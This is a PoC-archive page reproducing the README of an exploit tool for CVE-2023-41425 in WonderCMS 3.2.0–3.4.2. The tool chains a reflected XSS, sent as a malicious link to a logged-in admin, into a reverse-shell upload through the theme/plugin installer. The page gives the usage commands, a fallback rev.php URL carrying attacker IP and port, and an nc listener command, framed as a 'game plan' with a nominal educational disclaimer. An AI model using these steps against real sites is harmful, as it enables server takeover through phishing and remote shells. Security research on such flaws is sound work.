关联漏洞
描述
Xss injection, WonderCMS 3.2.0 -3.4.2
介绍
# CVE-2023-41425-WonderCMS-Authenticated-RCE
## Description
WonderCMS v3.2.0 - v3.4.2 is vulnerable. Remote attackers can take full control of the server using a Cross-Site Scripting (XSS) exploit (For educational purposes only ). Here's the game plan:
## How it works:
The exploit abuses the installModule component of WonderCMS to sneak a crafted script that runs arbitrary code.
## The Setup
* Tool: exploit.py
* What You Need:
- Target URL where WonderCMS is installed (no admin password required).
- Your attacker's machine IP.
- A port for your reverse shell listener.
## Step-by-Step Execution
1. The script generates a file called xss.js. This JavaScript weapon is designed to exploit reflected XSS.
2. It spits out a malicious link. You’ll send that to the admin.
3. The magic happens when the admin (a logged-in user) opens or clicks your link:
- Background requests fire without their consent.
- A reverse shell payload is uploaded using the theme/plugin upload feature.
4. Once uploaded, the payload executes and grants you a reverse shell connection straight to the target server.
```sh
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>
```
Example
```sh
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234
```
## Fail-Safe:
If the reverse shell doesn’t trigger automatically, just head over to:
```sh
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>
```
## note:
Remember start a listener using the following command:
```sh
nc -lvp 4444
```
## Credit
prodigiousMind for discovering and reporting the vulnerability https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413
文件快照
[4.0K] /data/pocs/f7f2d1be35c264f20b229602b2c820344b9f48c5
├── [3.0K] exploit.py
└── [1.6K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。